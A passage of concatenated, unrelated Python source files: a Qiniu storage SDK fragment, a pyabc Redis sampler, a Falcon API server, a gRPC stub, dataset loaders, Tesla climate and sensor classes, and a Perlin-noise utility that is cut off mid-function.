一个ResponseInfo对象 """ resource = entry(bucket, key) return self.__io_do('prefetch', resource) def change_mime(self, bucket, key, mime): """修改文件mimeType: 主动修改指定资源的文件类型,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/chgm.html Args: bucket: 待操作资源所在空间 key: 待操作资源文件名 mime: 待操作文件目标mimeType """ resource = entry(bucket, key) encode_mime = urlsafe_base64_encode(mime) return self.__rs_do('chgm', resource, 'mime/{0}'.format(encode_mime)) def batch(self, operations): """批量操作: 在单次请求中进行多个资源管理操作,具体规格参考: http://developer.qiniu.com/docs/v6/api/reference/rs/batch.html Args: operations: 资源管理操作数组,可通过 Returns: 一个dict变量,返回结果类似: [ { "code": <HttpCode int>, "data": <Data> }, { "code": <HttpCode int> }, { "code": <HttpCode int> }, { "code": <HttpCode int> }, { "code": <HttpCode int>, "data": { "error": "<ErrorMessage string>" } }, ... ] 一个ResponseInfo对象 """ url = 'http://{0}/batch'.format(config.get_default('default_rs_host')) return self.__post(url, dict(op=operations)) def buckets(self): """获取所有空间名: 获取指定账号下所有的空间名。 Returns: 一个dict变量,类似: [ <Bucket1>, <Bucket2>, ... ] 一个ResponseInfo对象 """ return self.__rs_do('buckets') def __rs_do(self, operation, *args): return self.__server_do(config.get_default('default_rs_host'), operation, *args) def __io_do(self, operation, *args): return self.__server_do(config.get_default('default_io_host'), operation, *args) def __server_do(self, host, operation, *args): cmd = _build_op(operation, *args) url = 'http://{0}/{1}'.format(host, cmd) return self.__post(url) def __post(self, url, data=None): return http._post_with_auth(url, data, self.auth) def __get(self, url, params=None): return http._get(url, params, self.auth) def _build_op(*args): return '/'.join(args) def build_batch_copy(source_bucket, key_pairs, target_bucket): return _two_key_batch('copy', source_bucket, key_pairs, target_bucket) def build_batch_rename(bucket, key_pairs): return build_batch_move(bucket, key_pairs, bucket) def build_batch_move(source_bucket, key_pairs, target_bucket): return _two_key_batch('move', source_bucket, key_pairs, target_bucket) def build_batch_delete(bucket, keys): return _one_key_batch('delete', bucket, keys) def build_batch_stat(bucket, keys): return _one_key_batch('stat', bucket, keys) def _one_key_batch(operation, bucket, keys): return [_build_op(operation, entry(bucket, key)) for key in keys] def _two_key_batch(operation, source_bucket, key_pairs, target_bucket): if target_bucket is None: target_bucket = source_bucket return [_build_op(operation, entry(source_bucket, k), entry(target_bucket, v)) for k, v in key_pairs.items()]
python
import numpy as np import pickle from time import sleep import cloudpickle from redis import StrictRedis from ...sampler import Sampler from .cmd import (SSA, N_EVAL, N_ACC, N_REQ, ALL_ACCEPTED, N_WORKER, QUEUE, MSG, START, SLEEP_TIME, BATCH_SIZE) from .redis_logging import logger class RedisEvalParallelSampler(Sampler): """ Redis based low latency sampler. This sampler is well performing in distributed environments. It is usually faster than the :class:`pyabc.sampler.DaskDistributedSampler` for short model evaluation runtimes. The longer the model evaluation times, the less the advantage becomes. It requires a running Redis server as broker. This sampler requires workers to be started via the command ``abc-redis-worker``. An example call might look like ``abc-redis-worker --host=123.456.789.123 --runtime=2h`` to connect to a Redis server on IP ``123.456.789.123`` and to terminate the worker after finishing the first population which ends after 2 hours since worker start. So the actual runtime might be longer than 2h. See ``abc-redis-worker --help`` for its options. Use the command ``abc-redis-manager`` to retrieve info and stop the running workers. Start as many workers as you wish. Workers can be dynamically added during the ABC run. Parameters ---------- host: str, optional IP address or name of the Redis server. Default is "localhost". port: int, optional Port of the Redis server. Default is 6379. password: str, optional Password for a protected server. Default is None (no protection). batch_size: int, optional Number of model evaluations the workers perform before contacting the REDIS server. Defaults to 1. Increase this value if model evaluation times are short or the number of workers is large to reduce communication overhead. """ def __init__(self, host: str = "localhost", port: int = 6379, password: str = None, batch_size: int = 1): super().__init__() logger.debug( f"Redis sampler: host={host} port={port}") # handles the connection to the redis-server self.redis = StrictRedis(host=host, port=port, password=password) self.batch_size = batch_size def n_worker(self): """ Get the number of connected workers. Returns ------- Number of workers connected. """ return self.redis.pubsub_numsub(MSG)[0][-1] def sample_until_n_accepted( self, n, simulate_one, max_eval=np.inf, all_accepted=False): # open pipeline pipeline = self.redis.pipeline() # write initial values to pipeline self.redis.set( SSA, cloudpickle.dumps((simulate_one, self.sample_factory))) pipeline.set(N_EVAL, 0) pipeline.set(N_ACC, 0) pipeline.set(N_REQ, n) pipeline.set(ALL_ACCEPTED, int(all_accepted)) # encode as int pipeline.set(N_WORKER, 0) pipeline.set(BATCH_SIZE, self.batch_size) # delete previous results pipeline.delete(QUEUE) # execute all commands pipeline.execute() id_results = [] # publish start message self.redis.publish(MSG, START) # wait until n acceptances while len(id_results) < n: # pop result from queue, block until one is available dump = self.redis.blpop(QUEUE)[1] # extract pickled object particle_with_id = pickle.loads(dump) # append to collected results id_results.append(particle_with_id) # wait until all workers done while int(self.redis.get(N_WORKER).decode()) > 0: sleep(SLEEP_TIME) # make sure all results are collected while self.redis.llen(QUEUE) > 0: id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1])) # set total number of evaluations self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode()) # delete keys from pipeline pipeline = self.redis.pipeline() pipeline.delete(SSA) pipeline.delete(N_EVAL) pipeline.delete(N_ACC) pipeline.delete(N_REQ) pipeline.delete(ALL_ACCEPTED) pipeline.delete(BATCH_SIZE) pipeline.execute() # avoid bias toward short running evaluations (for # dynamic scheduling) id_results.sort(key=lambda x: x[0]) id_results = id_results[:n] results = [res[1] for res in id_results] # create 1 to-be-returned sample from results sample = self._create_empty_sample() for j in range(n): sample += results[j] return sample
python
# -*- coding: utf-8 -*- import falcon.asgi import log from app.api.common import base from app.api.v1.auth import login from app.api.v1.member import member from app.api.v1.menu import menu from app.api.v1.statistics import image from app.api.v1.twitter import tweet from app.api.v1.user import users from app.database import db_session, init_session from app.errors import AppError from app.middleware import AuthHandler, JSONTranslator, DatabaseSessionManager, CORSMiddleware, WebsocketHandler LOG = log.get_logger() class App(falcon.asgi.App): def __init__(self, *args, **kwargs): super(App, self).__init__(*args, **kwargs) LOG.info("API Server is starting") self.add_route("/", base.BaseResource()) self.add_route("/v1/login", login.Auth()) self.add_route("/v1/statistics/count/image", image.Count()) self.add_route("/v1/menu/list", menu.Menu()) self.add_route("/v1/users", users.Collection()) self.add_route("/v1/users/{user_id}", users.Item()) self.add_route("/v1/users/self/login", users.Self()) self.add_route("/v1/member/list", member.List()) self.add_route("/v1/member/customes", member.Customes()) self.add_route("/v1/member/tags", member.Tags()) self.add_route("/v1/member/tweets", member.Tweets()) self.add_route("/v1/member/tweet/live", member.TweetLive()) self.add_route("/v1/member/youtube/channel/list", member.Collection()) self.add_route("/v1/twitter", tweet.TwitterList()) self.add_route("/v1/tweet/draws", tweet.Draws()) self.add_route("/v1/tweet/draws/live", tweet.DrawsLive()) self.add_route("/v1/tweet/custom/draws", tweet.CustomDraws()) self.add_route("/v1/tweet/custom/tags", tweet.CustomTags()) self.add_route("/v1/tweet/renewer/draws", tweet.RenewerDraws()) self.add_route("/v1/tweet/detail", tweet.TweetInfo()) self.add_route("/v1/tweet/ids", tweet.TweetIds()) self.add_route("/v1/tweet/member/{memeber_id}", users.Self()) self.add_route("/robots.txt", DenyCrawlers()) self.add_error_handler(AppError, AppError.handle) class DenyCrawlers(object): async def on_get(self, req, resp): resp.body = "User-agent: *\nDisallow: /\n" init_session() middleware = [CORSMiddleware(), AuthHandler(), JSONTranslator(), DatabaseSessionManager(db_session), WebsocketHandler()] application = App(middleware=middleware, cors_enable=True) if __name__ == "__main__": # from wsgiref import simple_server # # httpd = simple_server.make_server("127.0.0.1", 8000, application) # httpd.serve_forever() import uvicorn uvicorn.run(application, host="0.0.0.0", port=8000, log_level="info", ws_ping_interval=10, ws_ping_timeout=60 * 60, timeout_keep_alive=60 * 5)
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc from . import ParameterConstraintProvider_pb2 as ParameterConstraintProvider__pb2 class ParameterConstraintsProviderStub(object): """Feature: Parameter Constraint Provider Allows a server to apply constraints on specific command parameters after design time. It is recommended to specify the constraints in the Feature Definitions whenever possible. The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature Definition. As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an additional Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined. The constrained can be retrieved by reading and subscribing to its dynamic property. Example use-case: Loading and setting the positions a mobile robot can move to at runtime. """ def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.Subscribe_ParametersConstraints = channel.unary_stream( '/sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider/Subscribe_ParametersConstraints', request_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.SerializeToString, response_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.FromString, ) class ParameterConstraintsProviderServicer(object): """Feature: Parameter Constraint Provider Allows a server to apply constraints on specific command parameters after design time. It is recommended to specify the constraints in the Feature Definitions whenever possible. The constraints given by this Feature act as a logical AND to any constraints already defined in the Feature Definition. As an example: A constrained type has a Pattern Constraint, then the ParameterConstraintProvider specifies an additional Pattern Constraint - in this case the underlying SiLA Type has to follow BOTH Patterns defined. The constrained can be retrieved by reading and subscribing to its dynamic property. Example use-case: Loading and setting the positions a mobile robot can move to at runtime. """ def Subscribe_ParametersConstraints(self, request, context): """Parameters Constraints Parameter Constraints that constrain any specified parameters within this structure """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_ParameterConstraintsProviderServicer_to_server(servicer, server): rpc_method_handlers = { 'Subscribe_ParametersConstraints': grpc.unary_stream_rpc_method_handler( servicer.Subscribe_ParametersConstraints, request_deserializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Parameters.FromString, response_serializer=ParameterConstraintProvider__pb2.Subscribe_ParametersConstraints_Responses.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'sila2.org.silastandard.core.parameterconstraintsprovider.v1.ParameterConstraintsProvider', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,))
python
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def tobacco(path): """Households Tobacco Budget Share a cross-section from 1995-96 *number of observations* : 2724 *observation* : individuals *country* : Belgium A dataframe containing : occupation a factor with levels (bluecol,whitecol,inactself), the last level being inactive and self-employed region a factor with levels (flanders,wallon,brussels) nkids number of kids of more than two years old nkids2 number of kids of less than two years old nadults number of adults in household lnx log of total expenditures stobacco budgetshare of tobacco salcohol budgetshare of alcohol age age in brackets (0-4) National Institute of Statistics (NIS), Belgium. Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `tobacco.csv`. Returns: Tuple of np.ndarray `x_train` with 2724 rows and 9 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'tobacco.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/Ecdat/Tobacco.csv' maybe_download_and_extract(path, url, save_file_name='tobacco.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
python
from .wheel import Wheel from .tree import SyncTree
python
from .exceptions import ApigeeError
python
"""Const for Velbus.""" DOMAIN = "velbus" CONF_MEMO_TEXT = "memo_text" SERVICE_SET_MEMO_TEXT = "set_memo_text"
python
# -*- coding: utf-8 -*- from typing import List, NoReturn, Optional from .signal import Signal from .light import Light from .tv import TV class Appliance: def __str__(self): return f"{self.__class__.__name__}: {self.nickname}" def __init__(self, data: dict) -> NoReturn: self._set_member(data) def update(self, data: dict) -> NoReturn: self._set_member(data) def _set_member(self, data: dict) -> NoReturn: self.id: str = data["id"] self.model: dict = data["model"] self.nickname: str = data["nickname"] self.name: str = data["nickname"] # alias for nickname self.image: str = data["image"] self.type: str = data["type"] self.settings: dict = data["settings"] self.aircon: dict = data["aircon"] self.light: Light = Light(self.id, data["light"]) if self.type == "LIGHT" else None self.tv: TV = TV(self.id, data["tv"]) if self.type == "TV" else None self.signals: List = [Signal(**signal) for signal in data["signals"]] def signal(self, name: str) -> (Optional[Signal], bool): result: Optional[Signal] = next(filter(lambda x: name == x.name, self.signals), None) return result, (result is not None)
python
""" COCO provides a simple way to use the coco data set thru a standardized interface. Implementing this module can reduce complexity in the code for gathering and preparing "Coco data set" data. Besides that does the module provide a standardized and simple interface which could be used with any data set containing image file locations and bboxes. ######### # USAGE # ######### # set category filters filters param_coco_cat_filters = [['person'], ['car'], ['bus'], ['truck']] # set coco dataset locations param_coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json' param_coco_img_dir = '..\\COCO\\annotations_trainval2017\\images\\train2017\\' # load data set coco = COCO.CocoDatasetInterface(param_coco_annotation_file, param_coco_img_dir) data_x, data_y, data_dict_cat = coco.get_category_labeled_images(param_coco_cat_filters) ######################## # STANDARD DATA FORMAT # ######################## data_x is a list of image file locations [image_file_locations, ...] data_y is a list with labels [[[bbox1_img1, bbox1_category_img1], [bbox2_img1, bbox2_category_img1], ...], [[bbox1_img2, bbox1_category_img2], [bbox2_img2, bbox2_category_img2], ...], ...] The bboxN_imgN variables specify the actual bboxes in format [x,y,width,height] where x and y are the left top corner position of the bbox. """ from pycocotools.coco import COCO from BasicLib.BasicFunctions import * def show_coco_data_point(img, label_list, load_image_from_file=False): """ Display coco data set image and labels. :param img: loaded image of image file location :param label_list: labels :param load_image_from_file: interprets 'img' as file location when True. """ image = img if load_image_from_file: image = load_image(img) for bbox, category in label_list: pt1 = (int(bbox[0]), int(bbox[1])) pt2 = (int(pt1[0] + bbox[2]), int(pt1[1] + bbox[3])) color = (np.random.random((1, 3)) * 255).tolist()[0] cv2.rectangle(image, pt1, pt2, color, 2) show_image(image) class CocoDatasetInterface: """ This class forms a easy to use interface, meant to serve the data to a machine learning algorithm. Implementing this class can reduce complexity in the code for gathering and preparing data. Besides that does the class provide a standardized and simple interface which could be used with any data set containing image file locations and bboxes. EXAMPLE: from DataLibrary.COCO import * coco_annotation_file = '..\\COCO\\annotations_trainval2017\\annotations\\instances_train2017.json' coco_image_folder = '..\\COCO\\annotations_trainval2017\\images\\train2017\\' coco = CocoDatasetInterface(coco_annotation_file, coco_image_folder) images, labels, cat_dict = coco.get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']]) coco.print_available_categories() show_coco_data_point(images[0], labels[0], True) """ def __init__(self, coco_ann_file, coco_img_dir): """ Initialize class. :param coco_ann_file: file location of the COCO data set annotation file :param coco_img_dir: file location of the COCO data set image files """ # self.coco_annotation_file = coco_ann_file self.coco_image_folder = coco_img_dir self.coco = COCO(coco_ann_file) self.categories = self.coco.loadCats(self.coco.getCatIds()) self.filtered_category_ids = None def print_available_categories(self): """Prints all the Coco data set categories.""" print("ID: Category: Super Category:") for cat in self.categories: print("{:2} {:15} {}".format(cat['id'], cat['name'], cat['supercategory'])) print() def get_images_ids(self, cat_nested_list): """ Returns list of image id's of images which meet the given category filter. These id's can be used to load the image specifications. :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image in the following format: [['car'], ['cat', 'horse']] :return: list of image specifications, list of category id's """ img_id_list = [] total_cat_list = [] for cat_list in cat_nested_list: cat_id_list = self.coco.getCatIds(catNms=cat_list) total_cat_list += cat_id_list img_id_list += self.coco.getImgIds(catIds=cat_id_list) img_spec_list = self.coco.loadImgs(set(img_id_list)) total_cat_list = list(set(total_cat_list)) return img_spec_list, total_cat_list def build_category_dict(self, cat_list): """ Creates two dictionaries linking the coco category id's to the normalized id's and the category names to their normalized id's. These Dictionaries can be used to make id normalization and id to name linking easy. Returns two dictionaries.: cat_dict[0 .. n_categories] => cat_name cat_translate_dict[coco_cat_id] => normalized_cat :param cat_list: list of coco category id's :return: cat_dict, cat_translate_dict """ cat_spec_list = self.coco.loadCats(cat_list) cat_dict = {} cat_translate_dict = {} for cat_spec, normalized_id in zip(cat_spec_list, range(len(cat_spec_list))): cat_dict[normalized_id] = cat_spec['name'] cat_translate_dict[cat_spec['id']] = normalized_id return cat_dict, cat_translate_dict def load_image_annotations(self, img_spec, cat_translate_dict, cat_list): """ Returns annotations list bboxes in format [[x,y,width,height], bbox_category_id], ...] for the given image_spec, if bbox category is in cat_list. :param img_spec: coco image specification :param cat_translate_dict: cat_translate_dict[coco_cat_id] => normalized_cat :param cat_list: list of coco category id's :return: list bboxes in format [[x,y,width,height], bbox_category_id], ...] """ img_bboxes = [] ann_count_per_cat = [0] * len(cat_list) ann_spec_list = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_spec['id'])) for ann_spec in ann_spec_list: if ann_spec['category_id'] in cat_list and ann_spec['iscrowd'] == 0: img_bboxes.append([ann_spec['bbox'], cat_translate_dict[ann_spec['category_id']]]) ann_count_per_cat[cat_translate_dict[ann_spec['category_id']]] += 1 return img_bboxes, ann_count_per_cat def get_image_file_location(self, img_spec): """ Returns image file location :param img_spec: coco image specification :return: image file location """ return self.coco_image_folder + img_spec['file_name'] def get_category_labeled_images(self, cat_nested_list, verbose=True, print_func=print): """ This function forms the actual interface and output of the class, providing the coco data via a standardized and simple format. Returns a list with [image_file_locations, ...] a list with labels [[bounding boxes, bbox category], ...] and a dictionary linking the category names to their id's. The images contain all the categories specified in the 'cat_nested_list' parameter. :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image. :param verbose: print when True, a description of the selected data. :param print_func: contains a function to print 'verbose' information with. Is the print function by default. :return: a list with image file locations, a list with corresponding labels in format [[[x,y,width,height], bbox_category_id], ...], [[x,y,width,height], bbox_category_id], ...], ...] and a dictionary linking the category names to their id's. example: get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']] ,verbose=False) returns images with at least a person in it AND images with at least a car AND a bicycle AND a dog. labels for each category are added to each image, so a image images with at least a car AND a bicycle AND a dog might also contain labels of persons. """ img_spec_list, cat_list = self.get_images_ids(cat_nested_list) cat_dict, cat_translate_dict = self.build_category_dict(cat_list) # load images and annotations x_data = [] y_data = [] total_ann_count = np.array([0] * len(cat_list)) for img_spec in img_spec_list: image_file = self.get_image_file_location(img_spec) image_bboxes, img_ann_count = self.load_image_annotations(img_spec, cat_translate_dict, cat_list) total_ann_count += img_ann_count x_data.append(image_file) y_data.append(image_bboxes) # display data details if verbose: print_func("Categories selected: {}".format(cat_dict)) print_func("Total images: {}".format(len(img_spec_list))) for cat_id, cat_ann_count in zip(range(len(total_ann_count)), total_ann_count): print_func("Annotations in \"{}\": {}".format(cat_dict[cat_id], cat_ann_count)) return x_data, y_data, cat_dict def get_image_sizes(self, cat_nested_list): """ Returns a list of image sizes in pixels. If the same value for the 'cat_nested_list' parameter is used as with the 'get_category_labeled_images' method, will the returned sizes match the data_x and data_y result lists of the get_category_labeled_images method. So: img_size_list[i] belongs to data_x[i] and data_y[i] :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image. :return: list of image sizes in format [[width, height], ...] """ img_size_list = [] img_spec_list, cat_list = self.get_images_ids(cat_nested_list) for img_spec in img_spec_list: img_size_list.append([img_spec['width'], img_spec['height']]) return img_size_list
python
import os all = [i[:-3] for i in os.listdir(os.path.dirname(__file__)) if i.endswith(".py") and not i.startswith(".")]
python
import sys from datetime import datetime from datapipe.configuracoes import Configuracoes from datapipe.converters.tabela_hadoop import TabelaHadoop from datapipe.datasources.db2 import Db2 from datapipe.utils.constantes import YAML_CONTINUA_ERRO from datapipe.utils.log import Log, Niveis class TabelaControleException(Exception): pass class TabelaControle: def __init__(self, config: Configuracoes, nome_pipeline: str, bigsql: Db2, tabela: TabelaHadoop): self.config = config self.nome_pipeline = nome_pipeline self.bigsql = bigsql self.tabela = tabela def registrar_erro(self, erro: Exception = None): if erro: self.tabela.mensagem_erro = str(erro) Log.logar(erro, Niveis.ERROR) self.salvar() if self.tabela.continuar_em_erro: Log.logar( f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}. Tempo decorrido {self.tabela.timer}.", Niveis.ERROR) return True else: raise TabelaControleException(f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}, processo FINALIZADO " f"conforme a flag '{YAML_CONTINUA_ERRO}'.") def iniciar(self): Log.logar( f"Iniciando {self.nome_pipeline} da tabela '{self.tabela.nome}'.", Niveis.INFO_DESTAQUE) self.tabela.inicializar_temporizador() self.bigsql.selecionar_schema(self.tabela.schema) def finalizar(self): if not self.tabela.mensagem_erro: self.salvar() registros = f"{int(self.tabela.qdte_registros):,}".replace( ",", ".") Log.logar( f"{self.nome_pipeline} da tabela {self.tabela.nome} finalizado em {self.tabela.timer}. {registros} registros gerados.", Niveis.INFO_DESTAQUE) def salvar(self): valores = {} valores['JOB_CONFIG'] = self.config.nome_job valores['PIPELINE'] = self.nome_pipeline valores['DATA_PROC_CARGA'] = datetime.today().date() valores['TABELA_PROC'] = self.tabela.nome_com_schema valores['DATA_HORA_TABELA'] = datetime.today() valores['QTD_REGISTROS'] = self.tabela.qdte_registros if self.tabela.mensagem_erro: valores['ERRO_BASE'] = str(self.tabela.mensagem_erro)[:520] valores['TEMPO_TABELA'] = str(self.tabela.timer) valores['KB_TRANSFERIDO'] = self.tabela.kb_transferido schema = self.tabela.schema tabela_controle = self.config.tabela_controle try: if "." in tabela_controle: schema, tabela_controle = tabela_controle.split(".") # TODO: conferir quantos arquivos físicos tem a tabela de controle configurada # fazer isto no início do aplicativo, ao configurar log/zipar log # > O que fazer: Recriar a tabela de controle com insert/from para reduzir o numero de arquivos self.bigsql.salvar_registro( tabela_controle, valores, schema=schema) except Exception: _, mensagem, _ = sys.exc_info() if any(erro for erro in ['SQL0204N', 'SQL0206N'] if erro in str(mensagem)): self.__reconfigurar_tabela_controle( tabela_controle, schema, valores, mensagem) else: raise TabelaControleException(mensagem) def __reconfigurar_tabela_controle(self, tabela_controle, schema, valores, mensagem_erro): DDL_VERSAO_04 = {'JOB_CONFIG': 'VARCHAR(100)', 'PIPELINE': 'VARCHAR(100)', 'DATA_PROC_CARGA': 'DATE', 'TABELA_PROC': 'VARCHAR(255)', 'DATA_HORA_TABELA': 'TIMESTAMP', 'TEMPO_TABELA': 'VARCHAR(10)', 'QTD_REGISTROS': 'INTEGER', 'KB_TRANSFERIDO': 'VARCHAR(30)', 'ERRO_BASE': 'VARCHAR(520)'} try: if 'SQL0204N' in str(mensagem_erro): if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema): self.bigsql.salvar_registro( tabela_controle, valores, schema=schema) if 'SQL0206N' in str(mensagem_erro): tabela_controle_backup = f'{tabela_controle}_VERSAO_03' self.bigsql.renomear_tabela( nome_antigo=tabela_controle, nome_novo=tabela_controle_backup, schema=schema) if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema): self.bigsql.executar_script(self.__carregar_migracao( tabela_controle_backup, tabela_controle, schema)) self.bigsql.salvar_registro( tabela_controle, valores, schema=schema) else: # TODO: Deu erro ao criar tabela, renomeia de volta para não perder o que já existe self.bigsql.renomear_tabela( nome_antigo=tabela_controle_backup, nome_novo=tabela_controle, schema=schema) except Exception as ex: raise TabelaControleException(ex) def __carregar_migracao(self, nome_origem, nome_destino, schema): script_versao04 = f"INSERT INTO {schema}.{nome_destino} " \ f"SELECT NULL AS JOB_CONFIG, NULL AS PIPELINE, DATA_PROC_CARGA, " \ f"TABELA_PROC, DATA_HORA_TABELA, TEMPO_TABELA, QTD_REGISTROS, " \ f"KB_TRANSFERIDO, ERRO_BASE " \ f"FROM {schema}.{nome_origem}" return script_versao04
python
import inspect from enum import Enum from typing import Callable, cast, TypeVar from .._internal.default_container import get_default_container from ..core import DependencyContainer from ..providers import IndirectProvider T = TypeVar('T', bound=type) def implements(interface: type, *, state: Enum = None, container: DependencyContainer = None) -> Callable[[T], T]: """ Class decorator declaring the underlying class as a (possible) implementation to be used by Antidote when requested the specified interface. For now, the underlying class needs to be decorated with @register. Args: interface: Interface implemented by the decorated class. state: If multiple implementations exist for an interface, an :py:class:`~enum.Enum` should be used to identify all the possible states the application may be. Each state should be associated with one implementation. At runtime Antidote will retrieve the state (the :py:class:`~enum.Enum`) class to determine the current state. container: :py:class:`~.core.container.DependencyContainer` from which the dependencies should be retrieved. Defaults to the global container if it is defined. Returns: The decorated class, unmodified. """ container = container or get_default_container() def register_implementation(cls): if not inspect.isclass(cls): raise TypeError("implements must be applied on a class, " "not a {}".format(type(cls))) if not issubclass(cls, interface): raise TypeError("{} does not implement {}.".format(cls, interface)) interface_provider = cast(IndirectProvider, container.providers[IndirectProvider]) interface_provider.register(interface, cls, state) return cls return register_implementation
python
# Exercícios Numpy-32 # ******************* import numpy as np print(np.sqrt(16)) print(np.emath.sqrt(-16))#números complexos
python
# SPDX-License-Identifier: Apache-2.0 """ Python Package for controlling Tesla API. For more details about this api, please refer to the documentation at https://github.com/zabuldon/teslajsonpy """ import time from typing import Text from teslajsonpy.vehicle import VehicleDevice class Climate(VehicleDevice): """Home-assistant class of HVAC for Tesla vehicles. This is intended to be partially inherited by a Home-Assitant entity. """ def __init__(self, data, controller): """Initialize the environmental controls. Vehicles have both a driver and passenger. Parameters ---------- data : dict The base state for a Tesla vehicle. https://tesla-api.timdorr.com/vehicle/state/data controller : teslajsonpy.Controller The controller that controls updates to the Tesla API. Returns ------- None """ super().__init__(data, controller) self.__is_auto_conditioning_on = False self.__inside_temp = 0 self.__outside_temp = 0 self.__driver_temp_setting = 0 self.__passenger_temp_setting = 0 self.__is_climate_on = False self.__fan_status = 0 self.__manual_update_time = 0 self.type = "HVAC (climate) system" self.hass_type = "climate" self.measurement = "C" self.name = self._name() self.uniq_name = self._uniq_name() self.bin_type = 0x3 def is_hvac_enabled(self): """Return whether HVAC is running.""" return self.__is_climate_on def get_current_temp(self): """Return vehicle inside temperature.""" return self.__inside_temp def get_goal_temp(self): """Return driver set temperature.""" return self.__driver_temp_setting def get_fan_status(self): """Return fan status.""" return self.__fan_status async def async_update(self): """Update the HVAC state.""" await super().async_update() data = self._controller.get_climate_params(self._id) if data: last_update = self._controller.get_last_update_time(self._id) if last_update >= self.__manual_update_time: self.__is_auto_conditioning_on = data["is_auto_conditioning_on"] self.__is_climate_on = data["is_climate_on"] self.__driver_temp_setting = ( data["driver_temp_setting"] if data["driver_temp_setting"] else self.__driver_temp_setting ) self.__passenger_temp_setting = ( data["passenger_temp_setting"] if data["passenger_temp_setting"] else self.__passenger_temp_setting ) self.__inside_temp = ( data["inside_temp"] if data["inside_temp"] else self.__inside_temp ) self.__outside_temp = ( data["outside_temp"] if data["outside_temp"] else self.__outside_temp ) self.__fan_status = data["fan_status"] async def set_temperature(self, temp): """Set both the driver and passenger temperature to temp.""" temp = round(temp, 1) self.__manual_update_time = time.time() data = await self._controller.command( self._id, "set_temps", {"driver_temp": temp, "passenger_temp": temp}, wake_if_asleep=True, ) if data and data["response"]["result"]: self.__driver_temp_setting = temp self.__passenger_temp_setting = temp async def set_status(self, enabled): """Enable or disable the HVAC.""" self.__manual_update_time = time.time() if enabled: data = await self._controller.command( self._id, "auto_conditioning_start", wake_if_asleep=True ) if data and data["response"]["result"]: self.__is_auto_conditioning_on = True self.__is_climate_on = True else: data = await self._controller.command( self._id, "auto_conditioning_stop", wake_if_asleep=True ) if data and data["response"]["result"]: self.__is_auto_conditioning_on = False self.__is_climate_on = False await self.async_update() @staticmethod def has_battery(): """Return whether the device has a battery.""" return False class TempSensor(VehicleDevice): """Home-assistant class of temperature sensors for Tesla vehicles. This is intended to be partially inherited by a Home-Assitant entity. """ def __init__(self, data, controller): """Initialize the temperature sensors and track in celsius. Vehicles have both a driver and passenger. Parameters ---------- data : dict The base state for a Tesla vehicle. https://tesla-api.timdorr.com/vehicle/state/data controller : teslajsonpy.Controller The controller that controls updates to the Tesla API. Returns ------- None """ super().__init__(data, controller) self.__inside_temp = 0 self.__outside_temp = 0 self.type = "temperature sensor" self.measurement = "C" self.hass_type = "sensor" self._device_class: Text = "temperature" self.name = self._name() self.uniq_name = self._uniq_name() self.bin_type = 0x4 def get_inside_temp(self): """Get inside temperature.""" return self.__inside_temp def get_outside_temp(self): """Get outside temperature.""" return self.__outside_temp async def async_update(self): """Update the temperature.""" await super().async_update() data = self._controller.get_climate_params(self._id) if data: self.__inside_temp = ( data["inside_temp"] if data["inside_temp"] else self.__inside_temp ) self.__outside_temp = ( data["outside_temp"] if data["outside_temp"] else self.__outside_temp ) @staticmethod def has_battery(): """Return whether the device has a battery.""" return False @property def device_class(self) -> Text: """Return the HA device class.""" return self._device_class
python
# -*- coding: utf-8 -*- class NoiseUtils: def __init__(self, imageLen,imageWid): self.imageLen=imageLen self.imageWid=imageWid self.gradientNumber = 256 self.grid = [[]] self.gradients = [] self.permutations = [] self.img = {} self.__generateGradientVectors() self.__normalizeGradientVectors() self.__generatePermutationsTable() def __generateGradientVectors(self): for i in range(self.gradientNumber): while True: x, y = random.uniform(-1, 1), random.uniform(-1, 1) if x * x + y * y < 1: self.gradients.append([x, y]) break def __normalizeGradientVectors(self): for i in range(self.gradientNumber): x, y = self.gradients[i][0], self.gradients[i][1] length = math.sqrt(x * x + y * y) self.gradients[i] = [x / length, y / length] # The modern version of the Fisher-Yates shuffle def __generatePermutationsTable(self): self.permutations = [i for i in range(self.gradientNumber)] for i in reversed(range(self.gradientNumber)): j = random.randint(0, i) self.permutations[i], self.permutations[j] = \ self.permutations[j], self.permutations[i] def getGradientIndex(self, x, y): return self.permutations[(x + self.permutations[y % self.gradientNumber]) % self.gradientNumber] def perlinNoise(self, x, y): qx0 = int(math.floor(x)) qx1 = qx0 + 1 qy0 = int(math.floor(y)) qy1 = qy0 + 1 q00 